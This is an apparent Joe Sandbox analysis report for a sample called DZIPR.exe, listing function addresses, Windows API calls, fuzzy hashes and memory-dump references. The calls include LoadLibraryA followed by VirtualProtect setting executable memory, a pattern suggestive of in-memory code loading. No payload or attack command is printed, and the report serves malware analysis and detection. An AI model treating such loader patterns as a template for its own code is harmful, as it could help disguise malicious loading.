Opcode Fuzzy Hash: 5d14fe69f2a1c427e5b14fd869aa313619f179635f5b185cbc8a7995a243bfe5
Instruction Fuzzy Hash: DEF09076912710DFDB34ABB8C601B4D33A56F00728F45D55AD4A0A72E0DFBCA5C2CBA1

Function 6FA6A698 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61COMMON

Download Yara Rule

APIs

Part of subcall function 6FA6A59C: GetModuleHandleW.KERNEL32(KERNEL32,6FA6A6B6), ref: 6FA6A5AA
Part of subcall function 6FA6A59C: GetProcAddress.KERNEL32(00000000,CreateActCtxW), ref: 6FA6A5CB
Part of subcall function 6FA6A59C: GetProcAddress.KERNEL32(ReleaseActCtx), ref: 6FA6A5DD
Part of subcall function 6FA6A59C: GetProcAddress.KERNEL32(ActivateActCtx), ref: 6FA6A5EF
Part of subcall function 6FA6A59C: GetProcAddress.KERNEL32(DeactivateActCtx), ref: 6FA6A601

GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 6FA6A6D0
SetLastError.KERNEL32(0000006F), ref: 6FA6A6E7

Strings

, xrefs: 6FA6A705

Memory Dump Source

Source File: 0000000F.00000002.2747606978.000000006FA61000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA60000, based on PE: true

Associated: 0000000F.00000002.2747589985.000000006FA60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747733204.000000006FA91000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747733204.000000006FA95000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747773065.000000006FA99000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6fa60000_DZIPR.jbxd

Similarity

API ID: AddressProc$Module$ErrorFileHandleLastName
String ID:
API String ID: 2524245154-3916222277
Opcode ID: 9b7202bf5612ffb8e11c4989044f1aeb64deeb8fb95b44af71d819324653681b
Instruction ID: b1d80ec08e32fc2e326ad18c9eb92f0a53e63d5e9fa8ebd184d4ef84585b3b31
Opcode Fuzzy Hash: 9b7202bf5612ffb8e11c4989044f1aeb64deeb8fb95b44af71d819324653681b
Instruction Fuzzy Hash: 4B213A709107289ADB20DF74C9587DAB7B9BF05324F1086A9D069D6180DB786BC5CF50

Function 6FA68E50 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104), ref: 6FA68E78
PathFindExtensionW.SHLWAPI(?), ref: 6FA68E8E

Part of subcall function 6FA68BDF: __EH_prolog3_GS.LIBCMT ref: 6FA68BE9
Part of subcall function 6FA68BDF: GetModuleHandleW.KERNEL32(kernel32.dll,00000260,6FA68EB7,?,?), ref: 6FA68C19
Part of subcall function 6FA68BDF: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 6FA68C2D
Part of subcall function 6FA68BDF: ConvertDefaultLocale.KERNEL32(?), ref: 6FA68C69
Part of subcall function 6FA68BDF: ConvertDefaultLocale.KERNEL32(?), ref: 6FA68C77
Part of subcall function 6FA68BDF: GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 6FA68C94
Part of subcall function 6FA68BDF: ConvertDefaultLocale.KERNEL32(?), ref: 6FA68CBF
Part of subcall function 6FA68BDF: ConvertDefaultLocale.KERNEL32(000003FF), ref: 6FA68CC8
Part of subcall function 6FA68BDF: GetModuleFileNameW.KERNEL32(6FA60000,?,00000105), ref: 6FA68D7F

Strings

%s%s.dll, xrefs: 6FA68E99

Memory Dump Source

Source File: 0000000F.00000002.2747606978.000000006FA61000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA60000, based on PE: true

Associated: 0000000F.00000002.2747589985.000000006FA60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747733204.000000006FA91000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747733204.000000006FA95000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747773065.000000006FA99000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6fa60000_DZIPR.jbxd

Similarity

API ID: ConvertDefaultLocale$Module$AddressFileNameProc$ExtensionFindH_prolog3_HandlePath
String ID: %s%s.dll
API String ID: 1311856149-1649984862
Opcode ID: 1eef273f7aa224758605b084f8e5473b01c7540e364c50a1cb45483cd0144ff1
Instruction ID: 3d0a5f4eea6916425da8f23c3ca14eb237912da21d9794a35aee828632867211
Opcode Fuzzy Hash: 1eef273f7aa224758605b084f8e5473b01c7540e364c50a1cb45483cd0144ff1
Instruction Fuzzy Hash: 3101A2B1A19618ABCB11DB68DD85DEFB7BDAF4A310F0100A9A405E7140EEB4DA458B90

Function 6FA7C53C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 6FA75017: __getptd.LIBCMT ref: 6FA7501D
Part of subcall function 6FA75017: __getptd.LIBCMT ref: 6FA7502D

__getptd.LIBCMT ref: 6FA7C54B

Part of subcall function 6FA7A27F: __getptd_noexit.LIBCMT ref: 6FA7A282
Part of subcall function 6FA7A27F: __amsg_exit.LIBCMT ref: 6FA7A28F

__getptd.LIBCMT ref: 6FA7C559

Strings

csm, xrefs: 6FA7C567

Memory Dump Source

Source File: 0000000F.00000002.2747606978.000000006FA61000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA60000, based on PE: true

Associated: 0000000F.00000002.2747589985.000000006FA60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747733204.000000006FA91000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747733204.000000006FA95000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747773065.000000006FA99000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6fa60000_DZIPR.jbxd

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: csm
API String ID: 803148776-1018135373
Opcode ID: f8cc2f09cc03d4c7c6e467d980a2c87cccd186c913e22614bc70be444f49effe
Instruction ID: d2186df3325105b6d839a5290713680d7d9bd9099326282462a1afe2a1c17dca
Opcode Fuzzy Hash: f8cc2f09cc03d4c7c6e467d980a2c87cccd186c913e22614bc70be444f49effe
Instruction Fuzzy Hash: 800128798443059ACF349F60C540E9EBBBAAF10211F58442AD8509A6A1DF3AAAC0DF51

Function 6FA6BF5D Relevance: 5.1, APIs: 4, Instructions: 61COMMONLIBRARYCODE

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 6FA6BFBC
LeaveCriticalSection.KERNEL32(?), ref: 6FA6BFCC
LocalFree.KERNEL32(?), ref: 6FA6BFD5
TlsSetValue.KERNEL32(?,00000000), ref: 6FA6BFE7

Memory Dump Source

Source File: 0000000F.00000002.2747606978.000000006FA61000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA60000, based on PE: true

Associated: 0000000F.00000002.2747589985.000000006FA60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747733204.000000006FA91000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747733204.000000006FA95000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747773065.000000006FA99000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6fa60000_DZIPR.jbxd

Similarity

API ID: CriticalSection$EnterFreeLeaveLocalValue
String ID:
API String ID: 2949335588-0
Opcode ID: e1ab9c12afd2652b23634e2d38a671145a352cb4a81b46cb5f7680dc697bd909
Instruction ID: dd81c5bcc928b524b0c9510a117ef0a7d41cfc0589859dc9fb2695a7db9e3e38
Opcode Fuzzy Hash: e1ab9c12afd2652b23634e2d38a671145a352cb4a81b46cb5f7680dc697bd909
Instruction Fuzzy Hash: 1C114431600704EFD714CF54C884B9AB7A4FF46366F10852AF2628B6A1CBB5E891CF20

Function 6FA6C220 Relevance: 5.0, APIs: 4, Instructions: 38COMMONLIBRARYCODE

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6FA934A8,?,?,?,?,6FA6BB27,00000010,00000008,6FA6AF1F,6FA6AEC2,6FA66DDD,6FA6A591,6FA62BC2,?,?,?), ref: 6FA6C25A
InitializeCriticalSection.KERNEL32(-000071A8,?,?,?,6FA6BB27,00000010,00000008,6FA6AF1F,6FA6AEC2,6FA66DDD,6FA6A591,6FA62BC2,?,?,?,?), ref: 6FA6C26C
LeaveCriticalSection.KERNEL32(6FA934A8,?,?,?,6FA6BB27,00000010,00000008,6FA6AF1F,6FA6AEC2,6FA66DDD,6FA6A591,6FA62BC2,?,?,?,?), ref: 6FA6C279
EnterCriticalSection.KERNEL32(-000071A8,?,?,?,?,6FA6BB27,00000010,00000008,6FA6AF1F,6FA6AEC2,6FA66DDD,6FA6A591,6FA62BC2,?,?,?), ref: 6FA6C289

Part of subcall function 6FA66DC1: __CxxThrowException@8.LIBCMT ref: 6FA66DD7
Part of subcall function 6FA66DC1: __EH_prolog3.LIBCMT ref: 6FA66DE4

Memory Dump Source

Source File: 0000000F.00000002.2747606978.000000006FA61000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA60000, based on PE: true

Associated: 0000000F.00000002.2747589985.000000006FA60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747733204.000000006FA91000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747733204.000000006FA95000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747773065.000000006FA99000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6fa60000_DZIPR.jbxd

Similarity

API ID: CriticalSection$Enter$Exception@8H_prolog3InitializeLeaveThrow
String ID:
API String ID: 2895727460-0
Opcode ID: 39bfd20c036b96ab9fb31524fc02e966672b3e49fcc4bb7768d52ac27b4a6eb4
Instruction ID: 7fdfdb8ef49278db9efc6b6f80dd8fe2e66216e1a6f94fca5adcc388983f782f
Opcode Fuzzy Hash: 39bfd20c036b96ab9fb31524fc02e966672b3e49fcc4bb7768d52ac27b4a6eb4
Instruction Fuzzy Hash: 02F06872504314AFDE005AA8DC86705BB7DEFD336AF554026E69C86241CF7894D1C771

Function 6FA6BA5B Relevance: 5.0, APIs: 4, Instructions: 35COMMONLIBRARYCODE

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6FA932EC,?,?,?,?,6FA6C0B7,?,00000004,6FA6AF00,6FA66DDD,6FA6A591,6FA62BC2,?,?,?,?), ref: 6FA6BA69
TlsGetValue.KERNEL32(6FA932D0,?,?,?,6FA6C0B7,?,00000004,6FA6AF00,6FA66DDD,6FA6A591,6FA62BC2,?,?,?,?,?), ref: 6FA6BA7D
LeaveCriticalSection.KERNEL32(6FA932EC,?,?,?,6FA6C0B7,?,00000004,6FA6AF00,6FA66DDD,6FA6A591,6FA62BC2,?,?,?,?,?), ref: 6FA6BA93
LeaveCriticalSection.KERNEL32(6FA932EC,?,?,?,6FA6C0B7,?,00000004,6FA6AF00,6FA66DDD,6FA6A591,6FA62BC2,?,?,?,?,?), ref: 6FA6BA9E

Memory Dump Source

Source File: 0000000F.00000002.2747606978.000000006FA61000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA60000, based on PE: true

Associated: 0000000F.00000002.2747589985.000000006FA60000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747733204.000000006FA91000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747733204.000000006FA95000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.2747773065.000000006FA99000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6fa60000_DZIPR.jbxd

Similarity

API ID: CriticalSection$Leave$EnterValue
String ID:
API String ID: 3969253408-0
Opcode ID: 1f1f3f574166a536b75dfca2cc775ea7941c148772b0150669d56eb8719d5241
Instruction ID: 8529b0ed3ee62ab2c3fab050cd0cbd7c4f0f0d98b327ec894d1f3210515d40c9
Opcode Fuzzy Hash: 1f1f3f574166a536b75dfca2cc775ea7941c148772b0150669d56eb8719d5241
Instruction Fuzzy Hash: 83F0E9362647009FD7209F18CC88C0A7BBDEF863B03058515F65983200CE74F892CFA0

Analysis Process: DZIPR.exePID: 5464, Parent PID: 4568COMMON

Execution Graph

Execution Coverage:	3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	1666
Total number of Limit Nodes:	28

Executed Functions

Function 6C5363F0 Relevance: 4.7, APIs: 3, Instructions: 239
memorylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(00000000), ref: 6C536602
VirtualProtect.KERNELBASE(?,?,00000040,00000000), ref: 6C53663B
VirtualProtect.KERNELBASE(?,?,?,00000000,?), ref: 6C536654

Memory Dump Source

Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true

Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd

Similarity

API ID: ProtectVirtual$LibraryLoad
String ID:
API String ID: 895956442-0
Opcode ID: 7d18269d3a19ff6aeee86ed1d332651a57c82d39dfe884e352e81daae7c28854
Instruction ID: b8987e8362ff49fd2ca035aabc184e6607c689bbacdb677ee1b8eda4ae7aa4d2
Opcode Fuzzy Hash: 7d18269d3a19ff6aeee86ed1d332651a57c82d39dfe884e352e81daae7c28854
Instruction Fuzzy Hash: 7FA1E2306083658FC315CF19C88062AFBE1BFC5308F09996DE89997316EB71E955CB95

Function 6C535CA0 Relevance: 3.4, APIs: 2, Instructions: 353
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true

Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd

Similarity

API ID: LibraryLoad_memset
String ID:
API String ID: 2997193564-0
Opcode ID: a09681f15d80294c0ad333df92c3a0e2ce2985a98371f0b1e4341be7bca85b78
Instruction ID: 2d57ef7a92c4e3743a122bd10eaf4bce01ec2b99403c66fd82c15792486f8476
Opcode Fuzzy Hash: a09681f15d80294c0ad333df92c3a0e2ce2985a98371f0b1e4341be7bca85b78
Instruction Fuzzy Hash: 43E18BB0A087158FC714CF1AC89062AFBF1FF88308F55992DE89A87711EB30E855CB95

Function 6C535E70 Relevance: 1.5, APIs: 1, Instructions: 248
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GlobalAlloc.KERNELBASE(00000000,007F50EB), ref: 6C535ECA

Memory Dump Source

Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true

Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd

Similarity

API ID: AllocGlobal
String ID:
API String ID: 3761449716-0
Opcode ID: 073e685717d859c2270930c0e3e5bf8d2a9821b26d70affaecabaa57c31a1bbb
Instruction ID: 3cd5ce51d0460104234f3868cc047e1463fb2ce9a4ad7eae3407c89d91c1e7a3
Opcode Fuzzy Hash: 073e685717d859c2270930c0e3e5bf8d2a9821b26d70affaecabaa57c31a1bbb
Instruction Fuzzy Hash: E2A1A2B060C3268FC718CF19C89063AB7F2BF89304F55996DE89A87756E730E955CB81

Function 6C53BC4E Relevance: 16.6, APIs: 11, Instructions: 106
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlEnterCriticalSection.NTDLL(6C5632EC), ref: 6C53BC61
GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,6C5632D0,6C5632D0,?,6C53C0A4,00000004,6C53AF00,6C536DDD,6C5368AD,?,6C544902,?), ref: 6C53BCB7
GlobalHandle.KERNEL32(00E5AB98), ref: 6C53BCC0
GlobalUnlock.KERNEL32(00000000), ref: 6C53BCCA
GlobalReAlloc.KERNEL32(?,00000000,00002002), ref: 6C53BCE3
GlobalHandle.KERNEL32(00E5AB98), ref: 6C53BCF5
GlobalLock.KERNEL32(00000000), ref: 6C53BCFC
RtlLeaveCriticalSection.NTDLL(00000000), ref: 6C53BD05
GlobalLock.KERNEL32(00000000), ref: 6C53BD11
_memset.LIBCMT ref: 6C53BD2B
RtlLeaveCriticalSection.NTDLL(00000000), ref: 6C53BD59

Memory Dump Source

Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true

Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd

Similarity

API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock_memset
String ID:
API String ID: 496899490-0
Opcode ID: 408b32378aa411ee5079e38533456eafadb2fa8b5fc3fa38726e3f5429b430cb
Instruction ID: 36a171dd9d54c4d9432c7d85597d8b8fed66283d5e803134215052b00969f64d
Opcode Fuzzy Hash: 408b32378aa411ee5079e38533456eafadb2fa8b5fc3fa38726e3f5429b430cb
Instruction Fuzzy Hash: 5B31D071600B15EFDB21DF64CC89B5ABBF9FF80304B15496EE55AD7A10EB30E8448B90

Function 6C5364E0 Relevance: 4.7, APIs: 3, Instructions: 151
librarymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(00000000), ref: 6C536602
VirtualProtect.KERNELBASE(?,?,00000040,00000000), ref: 6C53663B

Memory Dump Source

Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true

Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd

Similarity

API ID: LibraryLoadProtectVirtual
String ID:
API String ID: 3279857687-0
Opcode ID: 9577c91a7365e7158946c7ba15e843e742d1158a45e9bdbc0990b3e8c8f71e48
Instruction ID: 6b888e49d4bf51fd7440b3629ae5c98cce1ba3e25e990f62815497f997b076f2
Opcode Fuzzy Hash: 9577c91a7365e7158946c7ba15e843e742d1158a45e9bdbc0990b3e8c8f71e48
Instruction Fuzzy Hash: 7951F5316083658FC715CF19C88062AFBF5BFC9308F59896DE88987316EA30E906CB95

Function 6C536750 Relevance: 1.6, APIs: 1, Instructions: 109
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadFile.KERNELBASE(?,?,00000000,?,00000000,?,?,?,?,6C55C168), ref: 6C536300

Memory Dump Source

Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true

Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 60f7e9650be2504ff8e16b7a8e5d273efc771413632a2dc2269b8a53189a8bed
Instruction ID: 7956eacc44193da0e69f2678ad3d46a706fc418c9dd9f0d68e21e673eb79cce6
Opcode Fuzzy Hash: 60f7e9650be2504ff8e16b7a8e5d273efc771413632a2dc2269b8a53189a8bed
Instruction Fuzzy Hash: 9541DF31A087158FC704CF19CC9067AB7E2FBC5314F19896CE88A8B316EA31E8558B84

Function 6C5362D0 Relevance: 1.6, APIs: 1, Instructions: 97
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadFile.KERNELBASE(?,?,00000000,?,00000000,?,?,?,?,6C55C168), ref: 6C536300

Memory Dump Source

Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true

Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: c0705672e5059a2723f5626f48db6b2a8d311d727e778840c64d6e93b7243879
Instruction ID: e30312aa27b68a23a92403c7459ffc403a6baffa6725b116f2da1091a23dcb2b
Opcode Fuzzy Hash: c0705672e5059a2723f5626f48db6b2a8d311d727e778840c64d6e93b7243879
Instruction Fuzzy Hash: 5531D131A097158FC715CF19CC9067AB7E2BFC4314F1A996CE88A9B316EA30F855CB81

Function 6C53C050 Relevance: 1.5, APIs: 1, Instructions: 43
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3.LIBCMT ref: 6C53C057

Part of subcall function 6C536DC1: __CxxThrowException@8.LIBCMT ref: 6C536DD7
Part of subcall function 6C536DC1: __EH_prolog3.LIBCMT ref: 6C536DE4

Memory Dump Source

Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true

Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd

Similarity

API ID: H_prolog3$Exception@8Throw
String ID:
API String ID: 2489616738-0
Opcode ID: c529eb6ab9b52fe0663edb77d35b00744b9d66cb044457ac65b6cf83565d8bde
Instruction ID: ab0a33ab7eee358e488c811f51757550e895bc67e432b8b6b9160e2f89f6d61f
Opcode Fuzzy Hash: c529eb6ab9b52fe0663edb77d35b00744b9d66cb044457ac65b6cf83565d8bde
Instruction Fuzzy Hash: 7A019A30701672CBDB19AE668C103AD37B2AB80318F11A62CD49A8BBA0EF34DD058B10

Function 6C5360F0 Relevance: 1.5, APIs: 1, Instructions: 33
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000004,00000080,00000000), ref: 6C5360F6

Memory Dump Source

Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true

Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: baa04df09d9cc3d853c8a2779e51a26c952c757ea6f83c99552bf59ef84ef4af
Instruction ID: 5fa3f8ea8c563cb29329e091ff9bd167046e303346f9b58944b8bc9413e04a97
Opcode Fuzzy Hash: baa04df09d9cc3d853c8a2779e51a26c952c757ea6f83c99552bf59ef84ef4af
Instruction Fuzzy Hash: 1A019A75A087019FC718CF1AC890916BBE5BFC9304F16856DE84897326D670E855CF99

Function 6C54A6F4 Relevance: 1.5, APIs: 1, Instructions: 20
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000,?,6C544776,00000001,?,?,?,6C5448EF,?,?,?,6C55E848,0000000C,6C5449AA), ref: 6C54A709

Memory Dump Source

Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true

Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: d136b9d88fbd6bf98443b55b9985daf940b613b9dd4cd2cc8e78e803d0bf6d69
Instruction ID: 969106aebf9d09d6d6a3052b167814cc6dd547f8b606544d8d9842b5e114450c
Opcode Fuzzy Hash: d136b9d88fbd6bf98443b55b9985daf940b613b9dd4cd2cc8e78e803d0bf6d69
Instruction Fuzzy Hash: 25D05E326A43449ADB109E769C09B263BFC9385796F558436F80DC6190E570C580DA09

Non-executed Functions

Function 6C53748E Relevance: 12.1, APIs: 8, Instructions: 126filestringCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6C537498
GetFullPathNameW.KERNEL32(00000000,00000104,00000000,?,00000268,6C5376D5,?,00000000,?,00000000,00000104,00000000,?,6C55BEF4,00000000), ref: 6C5374D6

Part of subcall function 6C536DC1: __CxxThrowException@8.LIBCMT ref: 6C536DD7
Part of subcall function 6C536DC1: __EH_prolog3.LIBCMT ref: 6C536DE4

PathIsUNCW.SHLWAPI(?,00000000,?), ref: 6C537546
GetVolumeInformationW.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000), ref: 6C53756D
CharUpperW.USER32(00000000), ref: 6C5375A0
FindFirstFileW.KERNEL32(?,?), ref: 6C5375BC
FindClose.KERNEL32(00000000), ref: 6C5375C8
lstrlenW.KERNEL32(?), ref: 6C5375E6

Memory Dump Source

Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true

